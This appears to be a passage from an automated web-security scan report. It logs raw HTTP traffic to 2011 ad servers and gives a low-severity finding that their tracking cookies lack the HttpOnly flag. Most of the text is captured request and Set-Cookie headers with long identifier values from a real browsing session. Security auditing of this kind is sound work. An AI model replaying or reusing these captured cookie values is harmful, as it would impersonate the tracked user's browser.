PRpc=|FOGhGJX7:1|FVpfGLBY:2|FYnnGK5Q:1|FOO8GJTu:1|FZt1GMjB:1|FZt2GMjA:1|FZt3GMSn:1|FWcMGLLp:1|FW9qGLZC:2|FW9nGLZC:2|FKqEGKwo:2|FWcLGLLp:1|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:3|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 13:31:01 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 1808
Set-Cookie:PRgo=BCBAAsJvCAAuILDBF-19!BCVBF4FRDVCFUE6;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=14A30400-4033-E2F7-1209-9890000A0200; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKNx*1039:2|AKDn*23939:2|AKLC*1774:2|AKTy*9203:2|AKRD*2017:4|AKQh*130:3|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:16|AKPE*832:3|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKNxAAQl:2|AKDnAGOH:2|AKPEAADS:1|AKRDAJme:3|AKLCAA2c:2|AKTyACY1:2|AKRDAA67:1|AKQhAACG:3|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:5|AKVYAACD:1|AKQkAFx5:4|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FOGi:1|FOGh:1|FVpf:2|FYnn:1|FOO8:1|FZt1:1|FZt2:1|FZt3:1|FWcM:1|FW9q:2|FW9n:2|FKqE:2|FWcL:1|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:3|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GJX6:1|GJX7:1|GLBY:2|GK5Q:1|GJTu:1|GMjA:1|GMSn:1|GKwo:2|GLLp:2|GMjB:2|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:7|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FOGiGJX6:1|FOGhGJX7:1|FVpfGLBY:2|FYnnGK5Q:1|FOO8GJTu:1|FZt1GMjB:1|FZt2GMjA:1|FZt3GMSn:1|FWcMGLLp:1|FW9qGLZC:2|FW9nGLZC:2|FKqEGKwo:2|FWcLGLLp:1|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:3|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
9.22. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&csid=G07610 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; NETSEGS_J07717=bff01c00ddc153c5&J07717&0&4df0a86e&0&&4dcb3d30&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4df0a87c&0&&4dca5d68&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4df0b07e&0&&4dca8ab1&271d956a153787d6fee9112e9c6a9326; rsiPus_qbvO="MLsXrrEOpxpv55DW8tahZ2a57v4BlC60cICOgIfdHU7gwI+bhP0TqX40neBrVzd04YF7hotNL+h4vvc66tVVUjceSeakCP8FKl+7vpw/cPKd8tMu3PMCPoyxK8+ZjwDWyB3QMrpomCL0QiC5Kvy/YgnB8KTN7G9dLpnN5M3RK+PP1zwMehHWmM2JccWRv5ZmhNfQmN/YDBU94E+biCIoa0pKkv2eA2x+zJ1SCIL380rO+L9Lk2iLRCLsePDloY4CaZKvkWcnHN4spMzHQnUA9nMhOsrooPww0kmF/1pBhtUOQIGwwBNshy3r9jL9DmeVgwo+si4cw2GLg+UiObBCYgDoqFuF17tgWtie8ndkcM4/dxQZHmAVAFp6Cd4+NKEDE1ApHgzdWMCRN3mtXvTF3dagjo97ZcxX3TK0H5gNZL/tX25K+rZRwN8wPyK9oLx40INCM6m5859n+iEwb4c3uHEIWIExaGsanUSO3meucYKt8SqtiIB1ZKfcV2EWnE5l0JI9ym05H0J1D++1YxD2YWIf3FMp0ODLJXHC5LJl8HAXM9kRR0eUwpIWZ43I4Sxu/ghMwCqycSGD5P5qCz+NfB7cpFNnCm/MZxXAtHhkwlvld7DwvFMTxzkmteonO6+tWDCvSgxfKLeBCsnh7/g2pdMlW86tZQUhX+5vIkdTKTAbn/ygJRg0T3sdyAIGgf6VindVNH18jDokISc3IGyw/B24wJC4km6cNzLCqq3zgXP3vffJqf4px62L8VMyvj3CaMObL1w9lE2lhd4iKvN3GccP1FcTweH5kHDsZZBw7FHK1W7K9ytiQtKzGQRCBtx0rurYuoXmj+tBMHYIGgQGQbpACUKiwMwgO11XDJXNsqWXOeTs409iMvRAAhFR3MmxY/Ai8JtqiI6b0Q1+g1WTMqPGi0honF4/t46uL9iK78Kt/amFrG5zPGbmiPmMFkLKl9wLroTlxm+6qkNbYbThc0/QKEKH9b1zlGLxfdlc3hqznACvxpp0ybDR66WjOYSYr5GJsa1Cu2wcBHbKR1AxsYBzoLba+u6l87gczye8xuTrYhFfwlnHydy7IYalgPJBk32vZgWW2CXqypZtqnwMKkA2NoSDvvRLOZsd5s2E5nriVmz0A020hMNet6ezR0BbsbFJkikbhD25+D5hxe38KqYGvD586gb8nEzI0j5isfTJ/lkLrhbQFBZeshLI9NVhvhrxY3ujvMVlKz2TG/zsc7BVzk9fFPtT7mgROfudWRI+VvwrnXNE2vCSQzOJZeEAKPJctLVBCeeH5f0I+bMVOeVLPDBFeBnbAN+UOthqW+XB3wOga/8nLvsjoupDcwH+hneOk/D89Naxn/NKF3MEN04OWc1SJ6wrzqU6VhG4EvS+Zv+fJ8Gt98W7PtFLVLD0oQ=="; rsi_us_1000000="pUMV4ylDPxYY7RUCt3RYS68XU2Z/uOqvJR0SNgYO9rFAJiyyAu+FxS1Z30ODwyEFcoEx3T1Eetffz3Mf20XkwCrwYFLZZJxtyzGTJat2XTjlIN8P+hQPSL5K9zsL+kusRTvgKYlhihBhqZKK6GKen73oVAV9BWGkbl//D/fTGMFsID28cq6D7duOtAY3S7ThixmzbEOMxOHaa0VO3cDkKGVKS9qitOaUYlvgkLY1MKDOtODLrFUkILMlSRpCe7+47YCa4Yvgfmntw+kxPheKq6wDe8Fd8gOqjo+YsYcbcBetJ/UlUtydzNb+VQfdT8dEj/2h41IZ5vmY/5vsAZW1gUJs43Y9iklV1tAb9jY/G3Rk4zy39xByfOtBbqnZZm8zU97WhpjXwdwTrCSEuJ4CNdY/fhO3f+aPVPTKG9RnYRL0QJ4kFGhThODFPtf76e2qY1SQ9slSHrnY01CTJTrHMxySjJKQAVAr1obI8ilzYsPlaT1OSvYVS9TK9PoGrO5Jx5bXw/zwwE6Wrxwt7KjBiQjMb8pc2/6daLQ71r2XwEeaREz3clc3XYbmXIZKYmXXjpSqe6jB0kwcSkFst/ViDZpkDsFltV4ci5YQ/eJMqmyKrF/0uup6pq93xJKQibeBPvkCxBjBIGLPE6+meOzdSPUPxAyoXPah9kyi7C70w/Ic06E82HDgxMfptenJH+QxMcJPPGsyFAVT+6SBuOjuKJ5KYDNUBXyxL2dg7B2oqDAiqh1W+megWtR3XoJXxE+b3k70BKlvT5YvEuZ0/RALqrZKe/52guDCx1yv8IEqB3NuIb5M9E0P1eLplz4HhYGMt1XJa6PPDxd4ljqvSFEQClJtagh9UzDEFg6Cb5LdDadrKiwtHRl62r3F/lJB8Wq3syJAxzEPLO4bM0VnXvq5faJnoE+6gBD5yjyVDaOWRfQzLGIWkNHa+f2KJvAyTQlC4oHYQZOGM/cVc3WrnRQmj1KDwCk/46Dq6gu9fFpETdaKz7DpE5AVcVASeUiRu6t0E9gdbxRFlQnHfQxlj0O0yv/8sVDJfLtBv7VEv6KvS85d/vyrS+3/lJtowlLX877yZqlnDrYhsgIzJ/B2kGU/Y2tWcJtJNzrSLvL6uC6zAE3YCN+2b8ZfetlvToWWUxLm+kOAX5sNQa84+z+Y7BiXKA28ArWYuR2BzhZYqV+lNsl8IuYWHrQEhBevE6yTgfXBfZ5ZWDuef3muciM4uxq9eRevsktzwd4ZolhUro4q9RDXzP+z/Jt3SlkekF3F1UyZn5rEt9sK3VhPrPz7bFs0pGO/fShWwUhEJGkkGofDmr7oO9xVS0wlWlGR+HiZLLiNXtFztdl/InifBdzZrv7tEgPT/Ekl1qqx4lzM76Hls1fjGRalSthbIGWedXoj3t9T64fqUJnYWdom7ygUV4OI6Uek4g2aJV2sE2HBrV7ibQMfkHW6H2qlf/AvGzXk5juIW8AOsU6N3bJugxzerwleYqkN4SEXHO2TsUUB2Hii30ULmVN5KVwl4AT7t07WbQfIgUgh+J4zgAJSZ1//mvY7cAo2t7r+WZ+3UqK9EVFlB88NDlOgh4Jm3SdKvwyEx2VIxC8FQZezWpUIHfmHUohseSJ3s3QYI0FyZt+UimHMdHcAt0unq75eibm7XCXgvJjZ8QEa2uTso9gthoSRwjtm4zJD8KuDs9Dol9dL10gwkePtd9XjMMl1IiMfHEGPMzYrTXatfWNnptioKHatYztwbz3JzwC1e1SaBMwSq2wE51biaKnVTIX7gjw1dfMUEcH+SSwe4EKfaZDW3Y8jNtoFzFv7v+gK3Q=="; NETSEGS_E05510=bff01c00ddc153c5&E05510&0&4df0b096&0&&4dc9f625&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4df0ca7b&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dca0a20&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUPF4U9BenIMH/AtZKgq+hMq9rGiLObgpWFak32IrQMGnmfHuiYgDQaAwxUK6pw26DoqxCfW+epi+gzC9/vSCTB7imSFpaF3jgTKu6gUiM/MJRCfSdEcMdPs9/RVdVv7DqMTpKG3eKUxCc7lJ3d4uPsvbVf83JLReyHT0jN1BuyEb58GYv/LxKgpVexexquZuKeRToBghnCuFqedwf+X0+YnFhOw3uzxK/X4Wxo4bJAn8weCR02tpdbg/bYqVKAiPNbO41848Z9KpOZKRQN0OL0sNJ8kypkLypj36j7Rm+95zJAPtLzSvq8LWyyFTHdPsSmDFFA0qN+hBON4H4Tla7JACrXtwZLbYkaPwY2qoG7JOev/Lg0kSAEhAN2j3I9if3B+HvsTrxBc9VsohGW/b5fsT/tmOND8GjL62aEQOR/ttAt0Onz37bTRxfaITzexWf8P4aLkngBQJFzAETbKu4iCLf6EtYpH/CugM6sxzwqlgJTBZx1A1ese7+q70nG0SvwKBqGIcTjIrFSjkDn5CzxinzmiyVAsj6DVZYCcQpO4K6wrWzDkpOGhK634uztGpLBxzNDkL2iLHVGdEKz5Km4E8XnMsb2RyQbsw85L6avb/ndujGtWPB5NktpSBX1O6xykGxIlNcuEc5A5TFcViyPHJABw0+SY5WKWD8c2KF7QNnJTYgtZ3vm04i/IDcOYg2G5ip1hh4c1VnrEwseNA7qKF/Cy3/YzH+zE075ArEjlj9BV5xbUneXnlUeWlupie2OZe8u2ys5vCR9G9DnRtFNHmqqqFsP1L8ZVcernhjIjN6695svzJRD24Wa6NO2oyXiieRAotYX9Fznu+/iFDnFKMY6gcKtR40K5DJPZ; rtc_8VB0=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; udm_0=MLv39zEJZjpn5t6vNwncn9Mhfm4nwPAq6ZuDn7aMZJ8AwsYAiiLCTArLH9zv1q5u+Lz4nRQU/ONtffuYZpEkRs7NSG0d9YhuoyF/MDVEU0eLoGV7CxWL+UMe7334j5jcQIpfs/yJtACeEpy404q3OrCeAI2wpexHC/IoDhZG5nt9JTlTOC0rUKpf3Tdo6hNWvImLqBVP8ps0lApz51dEO2W4LKo/vgAH8xS9eNJjV468/KuVWTcVzlHlhch6C7KXmQypGx4uASRIIVVd4xtBBX3TCSwTCSvq1RQf0H1lUJj7U2F7SbkoidrdNSNQYzn4q6heYKCeXjIGgaQ/A8hTpIO/gpYXHOAt71UVgPxcAm4fAa8JAjHA7iuw87T+BAc30ukDlNY1I/9/QVLCxTIXzloa/UqpgRTBHVAqkWtHNek2VRJBqrL5B/mWPUocGOb8DniKhuT7Ds7UPRBMexdFIHHI/mpU6yYmGNVwFQueFK01IWdDQarKK0P8NCGCo8hv8tuHkabXf8v7ZAV+yBQS8r3xiWTE1bP2OU/lS16fEp/i6wdmm3O3Fg3xrGmJbPDi0mf2WCD6VbG011u8gzVu9OTKDFxHneEny+70WuBBMYdpc5p4oKIFOTsS7fE2b96gku/XlfSB0WZoA90Ay6NAPMEL30rVqZKtDW8lAhzZn5hG6VyiZpsCneZNiXd42Fux0d4/yHR6wIaoS759qSOsmbV42omwnxZ2196cYXobfYLlDrGupJET0DH8mfrZFU8hHbFNX+CicMjq+3nGDTPBOwaqHx5Gmaav13axGITWM+e0An32Zjjz8ctWphmPC3OJhpGA3+YV5ZbMpWkEMLtxGX3SA42XlGiOTF6YKfGB3GsRFYIdJQizVIBWE/awvxf6lY17BunO3IleRCw4HjwlENbyeRATa7q8yTB3q6umGD8JoD/yd7gPPc2OmQggvinyn01WB9ifgMK1ZtoAtTumru6m2/c8W/PNvgE0J/rD8dFVwZD6OhaeAmx/3bq2Vh40efswOHYzNaqrYDJklpdWVRuKCgkS6AZszXI/3Xe9jUDDkny/WFWAvgeklDJRJwNq3pI58aI5stulcQdIJJxUIoDPQNhpwJFTVE7o31+O8FPJiSLpIuaSbCihy2Dxw97Rq2QUPRWf6knC0Sq5o9PDh2q14/AYkZyEBkX7XG8gWBrah2ZWvHM0o9R8Cf9Mpk3pmIDqOFy8UPj5Bnd6+JkF3fe6p+OFEdr7mZwx6PDLZJ+qHjC+zR+gFjxwrGYx7LCzolcSXN1KBy8NC7LbgOdmlFyg3aJRwNBHu+zaRVWgjK1MAkAQXABPMMNJncnjf2mzZVZK5i7CVqutEvzATQAk/4e2gw1H+6Hrv9gG9XpGMmoJo0SYS9XA8fFkwrHVqpCX1aVEMSdMOLDjPQzYn6yL0C1Z3E3sZA6/rAuE2WDyQcqns3VA4i/eJ7mPOghnw1QJZDLPMjbOaVyZ9jFId0OWFFkTtXgjPjkLLEWjvMPWD8HrDp3nIsDSmoCZEdTF33/bQxSuGrV7CPQoqiVTUuzmqVjVmH9c2zitJblsG2xUll03h/2VyIoVcdT7u/BuNBnmNQZlo5GlwAK7lt5iJZl/jA==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_qbvO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_qbvO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ACkx="MLsXrrEOpxpv55C28tahZ2a57v4BlBm9Y8OavLvXmNxWuZvP+AaSaAp+hCNi+Atwis1ELtJdrj4R8mSRjjy362Kg9l9j12Gne8dMQJZUXWmSdO5nwhjxWdV4Kc+ZjwDWyB3QMrZomCL0QiC5Kvy/YgnB8KTN7G9dLpnN5M3R12PP1jsIeQESkSCfQd2Rv5bmkvNXim0YaZH/oAOOvyT6fStPkv2uQ2x+zJxYCKJ380tO/7NDk1Cr5CLsePblwe5CaZKtk2cnHN4ypKxHQnUA9nMhOh40Y7eWFEyF/1pBhtUOQIGM4FNshy/r9uoVanI7S9wjsu7cQ2GLx6klsw3fKG0LRYXJoO8BPzDZ0Ad33A1LcxSZSjelmPU0uZlBQGDTldAMhtSq/qB4zDVsHhTVoKMi95sLa1jCxlwUg6T1ZO+HYWDOHTJi0LagESEUnsxiWBCBRgmQyURk897T7pkrz3dKGIro6ZFXf3ae2gPfbIofOF6NRrU4YRy5dGJW9NAt4MjjIm7I43pxxByrZTLL+GxbsmE0GBWRWZCbjkRjImDMKhEfiDy0yW6Z5o0xJi8Hzv55UNwWyqDPr6NsUVX3YRZbHuTmBme3eL1fD8vlNhdDdAEiymTDg8ZDFZXYXg+4eCCvGtmB78iT2s7h74g2pbMFW87TZUUhX+5uIlcTjarrYWFiJBg0T3kdyCIGgb6VinZVNHl8zMbgIvbN5HvSVqXJ4f2pxG6cNzTKqp3zAXN3y6Z5dLC4za278TMyvj3EaA+9GXL5Q3umhZ5iKvOL2MQN1FszweH5kHDsnZBw7FHK1W7K9ytiQlKyGwRcFvx0ruvYvIXmj+tAMIIPGAQmI8DhNchCSNHQB76PtPXrdccpA2pXLl9bFALdy6Cloe92PzExfrDPCyXYizoO35nHHt261b7BNW7mlXu4HE+RMzKp/w3DDxq3P51FqfLazcKXAKo+k+eUMiKBhuDeHmNx9gxE+tMHBDvefXEaobba8kIG/d3ZnetS0v143+v9cRjC8vrdgFjuw2njlOJAK+4WiUjbkg3cvNuLBQHQuJCFczNaLVfhEV3c2j5zNjp/154CvaHZdLa5M4QL0vDFSyslWGvxs13V5K8zoAQ7fXdIvu4gsa2pHs2QyHQZ7oMFPBS4AswOxs1D85HD16/Fs0sx4LRf45JIP1RkCzIJQobpFDEpAzLn+iKiRZ/8fN46Tpo9vq/IhDfZco4Dvnz7Lk6YL2cECgE1wTPIX+rntGoV7Pz3CBVtMpYG9UnxmrqVza894dY842yruwTSp5/c0eWxjWvuha7gOZlZwngerodWjVjvQarZNPef5tKXMGB5hB32jgtGEA0EgYnGf6WvcsHUS67HvafQdkBQoClqw23HwnnAnjxdCEbZ1TWfb1B4rNU="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMV4ylDPxYY7RUCe6kEnJeDmFfDpj6Di1CrYq+kINMQgTDBTrooc7usfixoqIdj/1E4CcIAVs189WsefoulfV2+/Fr7fw2QgdF9a0bLVdVCmUU0nA+HlcLT5zMatL70T/uRPKfhehDnmFwEfmtC1NFoZLDs99p4lm6IfMHeHwGHaC/T2SCtvlwJavWhcO6eYD0bQA1Hb4bCQGm3tRSMoKP/qlF6nf5vZ6qe5ZApKFNQySD1x+Imd5A4HTACBAaI8aNf/8O/Do+G/ujoZcUcxVJ7WKAv3L7uWPOTJINcWCI/zihYP3LqEsKxFusDUM+4Ictn+nscAVeiLA1VCvN4hoswjisKJYHkzSA5sJQ8D9lhymHaYGtPLmPE/DihgbpTTV6ZxAZQj0L7DdP1xVluU9pWlBCTCvaUljU7N3JrwOEaC6Guif9KFb3mkC1RuSY9jUIEKUGfoM36ZXfsUiewEjC0csUDllT2Ke6/7aDzQHxRrWF5PKtcdzQOLu0YkFOun5yE+VA0C0cU1Oy4LShOLzDh0+Y7z